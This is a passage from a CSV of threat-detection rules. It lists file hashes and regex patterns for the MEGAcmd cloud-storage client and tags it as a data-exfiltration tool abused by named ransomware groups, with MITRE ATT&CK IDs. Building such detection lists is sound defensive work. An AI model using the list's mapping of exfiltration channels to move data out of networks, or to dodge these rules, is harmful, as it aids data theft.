Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*6f35a34033499938700e42f4123399f711003d2dab83ed50e69f7df5ecf976d8*",".{0,1000}6f35a34033499938700e42f4123399f711003d2dab83ed50e69f7df5ecf976d8.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*6f54f9c1108613f68114da87cba5fc1c4a800d62fcfaf42d8b3cbb76436f5cb6*",".{0,1000}6f54f9c1108613f68114da87cba5fc1c4a800d62fcfaf42d8b3cbb76436f5cb6.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*75c997df094171b145b07be980e5812a4c853d8c5e0a6d465a3d5b924af7c23e*",".{0,1000}75c997df094171b145b07be980e5812a4c853d8c5e0a6d465a3d5b924af7c23e.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*772500800e1771de69a364caf268b648333c69c97b5727f132605ec01c51d2d0*",".{0,1000}772500800e1771de69a364caf268b648333c69c97b5727f132605ec01c51d2d0.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*776a5e227d275f6a777ea5c7886e69efe5b9ee9da3fd79700965f4809cde5d27*",".{0,1000}776a5e227d275f6a777ea5c7886e69efe5b9ee9da3fd79700965f4809cde5d27.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*7b2aeb01bd57aa53f1d615294fa425aaa3d82f43474ed529d9a33efb873a183e*",".{0,1000}7b2aeb01bd57aa53f1d615294fa425aaa3d82f43474ed529d9a33efb873a183e.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*7d9713740d78deeabff15b6080a387460a315a680777d4f1e04c498f1b708826*",".{0,1000}7d9713740d78deeabff15b6080a387460a315a680777d4f1e04c498f1b708826.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*7d97c9853b4bfb386f351545d1a4c0bafea316ccc6ca9c710a3db65ac622067a*",".{0,1000}7d97c9853b4bfb386f351545d1a4c0bafea316ccc6ca9c710a3db65ac622067a.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*7ec46c20cc8b0d99d230cf54b0e12d97ac4a5049f22badbe7164e7b6d75607d1*",".{0,1000}7ec46c20cc8b0d99d230cf54b0e12d97ac4a5049f22badbe7164e7b6d75607d1.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*7f21c8cb257523a9e810b7e7ae76308b2740fef55dc13f265c427876aa87b559*",".{0,1000}7f21c8cb257523a9e810b7e7ae76308b2740fef55dc13f265c427876aa87b559.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*7f4747710ba404d04c752320fce43e95fc680ee631fdee2e7ae3ceddb84420a9*",".{0,1000}7f4747710ba404d04c752320fce43e95fc680ee631fdee2e7ae3ceddb84420a9.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*8558ee2389b4493ff9b3d9bcab252564a817284583d651649ce79d7091ea45d3*",".{0,1000}8558ee2389b4493ff9b3d9bcab252564a817284583d651649ce79d7091ea45d3.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*89a1b21160a0e3890c45596d7832ff37474a2c3200423f23adee11ff676b295b*",".{0,1000}89a1b21160a0e3890c45596d7832ff37474a2c3200423f23adee11ff676b295b.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*8c191b2d03ec58627fd172193f1b90871524c5ebffe364f71308ee74de5168d4*",".{0,1000}8c191b2d03ec58627fd172193f1b90871524c5ebffe364f71308ee74de5168d4.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*8c35ea32fdfbf8dd949fb86b3f8badfb46d40cfbb6fb80fb174c0a39cc1547df*",".{0,1000}8c35ea32fdfbf8dd949fb86b3f8badfb46d40cfbb6fb80fb174c0a39cc1547df.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*8e34869d0ba4e0fce056c0c000758541cb48a494ee6e7b516cb3085ded7e44c7*",".{0,1000}8e34869d0ba4e0fce056c0c000758541cb48a494ee6e7b516cb3085ded7e44c7.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*90eff64c5a742c7d96d87648a15bcb33145ebebab593f0c0161dae22880b90a0*",".{0,1000}90eff64c5a742c7d96d87648a15bcb33145ebebab593f0c0161dae22880b90a0.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*91c60eb7b5f95951e96a2437ee51dbae7821377e8e4864279b41c53791481b6a*",".{0,1000}91c60eb7b5f95951e96a2437ee51dbae7821377e8e4864279b41c53791481b6a.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*92a11c9ee2af4ffb55d05210813c7ff309f90274a1d211018acc2643367b2534*",".{0,1000}92a11c9ee2af4ffb55d05210813c7ff309f90274a1d211018acc2643367b2534.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*94004895c51abc532d7bddc290fa71d5b390dec2daa7d4b9ecc6e257896ac564*",".{0,1000}94004895c51abc532d7bddc290fa71d5b390dec2daa7d4b9ecc6e257896ac564.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*9bb03c64894f76241a0c97d210a95a8a5d538a660b8067b1748dd157b1ddeaa6*",".{0,1000}9bb03c64894f76241a0c97d210a95a8a5d538a660b8067b1748dd157b1ddeaa6.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*9bc358f934bfbeb12347083aef6b7a6efe26846b83ce0e653a4b89c64ba89073*",".{0,1000}9bc358f934bfbeb12347083aef6b7a6efe26846b83ce0e653a4b89c64ba89073.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*a1f3b5d701bc32776e8a37bcda5a73dbde9d5b1de9f6037aac09cbbb2542d1cf*",".{0,1000}a1f3b5d701bc32776e8a37bcda5a73dbde9d5b1de9f6037aac09cbbb2542d1cf.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*a20fb6cf0d1e9c86de68b8665fbbf0974b04c69beccd41d7123f6b3004221beb*",".{0,1000}a20fb6cf0d1e9c86de68b8665fbbf0974b04c69beccd41d7123f6b3004221beb.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*a22417b2eccc3ab5a32aecee8bd004cbbef73fe80d58119d23223163985d1f6b*",".{0,1000}a22417b2eccc3ab5a32aecee8bd004cbbef73fe80d58119d23223163985d1f6b.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*a2798030e4a1455864158becf472780f95d347588b681031366fb776741c0880*",".{0,1000}a2798030e4a1455864158becf472780f95d347588b681031366fb776741c0880.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*a347a180847fa3dca00bc28dd1321f5b332fdf574c73ea2b30ef3fab63b2380b*",".{0,1000}a347a180847fa3dca00bc28dd1321f5b332fdf574c73ea2b30ef3fab63b2380b.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*a45f1250e0125326747fcd299ef10b98e39b4fa7e6d6865dabe0a6c8225013ef*",".{0,1000}a45f1250e0125326747fcd299ef10b98e39b4fa7e6d6865dabe0a6c8225013ef.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*a48dfc0e20bd69e3774d74860f2a74691addf9fbaae42c71450561a4d526f92a*",".{0,1000}a48dfc0e20bd69e3774d74860f2a74691addf9fbaae42c71450561a4d526f92a.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*aa3244dd4ccc78f549783e6f27951d294aa6a54f349bd9eef5c89830e1742505*",".{0,1000}aa3244dd4ccc78f549783e6f27951d294aa6a54f349bd9eef5c89830e1742505.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*aab45aa9eac5e0b9865f44a234f6c5cddbc3b2fcb14aa4fee101cbcef2ba37d8*",".{0,1000}aab45aa9eac5e0b9865f44a234f6c5cddbc3b2fcb14aa4fee101cbcef2ba37d8.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*ab36f1dcf6cfd93b95bf5394b1ef22deff505df685c9b0a36d25fa9c94f4b548*",".{0,1000}ab36f1dcf6cfd93b95bf5394b1ef22deff505df685c9b0a36d25fa9c94f4b548.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*abb90f97b0e132f7d40af31e0935f7d15bb737d2ee59650e6846ddbca1f8afe9*",".{0,1000}abb90f97b0e132f7d40af31e0935f7d15bb737d2ee59650e6846ddbca1f8afe9.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*ac1d8b0b8458ec134d5c85fa863c3d8ed016e35454dedae79698ad0818919b7f*",".{0,1000}ac1d8b0b8458ec134d5c85fa863c3d8ed016e35454dedae79698ad0818919b7f.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*add7fb1cea253b5e58f7ab41b8db1ef3438c6dd59c6f5d95dfc18c60097ca5f3*",".{0,1000}add7fb1cea253b5e58f7ab41b8db1ef3438c6dd59c6f5d95dfc18c60097ca5f3.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*api@mega.nz*",".{0,1000}api\@mega\.nz.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#email","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*apt install 
*megacmd*",".{0,1000}apt\sinstall\s.{0,1000}megacmd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*b159333d4411c72736ec1c54cbca34c6ead9ff7779de79dc968387e61570f0d5*",".{0,1000}b159333d4411c72736ec1c54cbca34c6ead9ff7779de79dc968387e61570f0d5.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*b309f0785461dbe35a63b0a674cc70381ef7f87720d2aa884a8dbc8ae3c2c42e*",".{0,1000}b309f0785461dbe35a63b0a674cc70381ef7f87720d2aa884a8dbc8ae3c2c42e.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*b47b85efda1561b559c7d1a81e0d4b49958607f6e4933bf46f97f43c917f69a7*",".{0,1000}b47b85efda1561b559c7d1a81e0d4b49958607f6e4933bf46f97f43c917f69a7.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*b4fd5651fedd284d57bae7f1eee41e3f9ef77e2d21014159081ce9200f886ace*",".{0,1000}b4fd5651fedd284d57bae7f1eee41e3f9ef77e2d21014159081ce9200f886ace.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*b69c2f0acc58d45ae4dae502892af08ce9abaa0de2433573a07e9a06fae3a255*",".{0,1000}b69c2f0acc58d45ae4dae502892af08ce9abaa0de2433573a07e9a06fae3a255.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*b6ff6c05c78901dfc6291751bab1ae93a0ac836d8d506e57d2bb6fb927facc7d*",".{0,1000}b6ff6c05c78901dfc6291751bab1ae93a0ac836d8d506e57d2bb6fb927facc7d.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*b7b76dbe6c1976ebdb81e3b87284910f581cc79b7baa9f5073b0193c6f16b0d8*",".{0,1000}b7b76dbe6c1976ebdb81e3b87284910f581cc79b7baa9f5073b0193c6f16b0d8.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 